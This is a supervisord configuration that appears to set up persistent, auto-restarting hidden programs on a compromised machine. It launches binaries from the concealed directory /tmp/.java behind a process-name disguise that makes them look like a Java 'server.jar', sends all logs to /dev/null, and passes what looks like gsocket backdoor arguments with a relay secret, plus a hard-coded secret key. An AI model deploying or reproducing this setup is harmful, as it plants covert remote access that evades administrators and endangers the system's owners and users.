[supervisord]
logfile=/dev/null

[program:apple]
directory=/usr/local/bin
environment=PORT="27103"
command=/tmp/.java/bin/uid ~~m ~~n 'java -Dterminal.jline=false -Dterminal.ansi=true -jar server.jar' ~~f /tmp/.java/bin/.a/java
stdout_logfile=/dev/null
autorestart = true

[program:kfi]
directory=/usr/local/bin
environment=KULFI_SECRET_KEY="91dbd412e692da73fbff40c5c205bf3a3c0e8771d8b5dd1e5c2be8fe20e60839",M_PORT="27103"
command=/tmp/.java/bin/uid ~~m ~~n 'java -Dterminal.jline=false -Dterminal.ansi=true -jar server.jar' ~~f /tmp/.java/bin/.b/java
stdout_logfile=/dev/null
autorestart = true

[program:google]
directory=/usr/local/bin
environment=GSOCKET_ARGS="-s i0A9E7D1X-9g8H6b5j7K7o1-X1eCd9F9440-i0J6d6A2c5J1g6 -liq"
command=/tmp/.java/bin/uid ~~m ~~n 'java -Dterminal.jline=false -Dterminal.ansi=true -jar server.jar' ~~f /tmp/.java/bin/.c/java
stdout_logfile=/dev/null
autorestart = true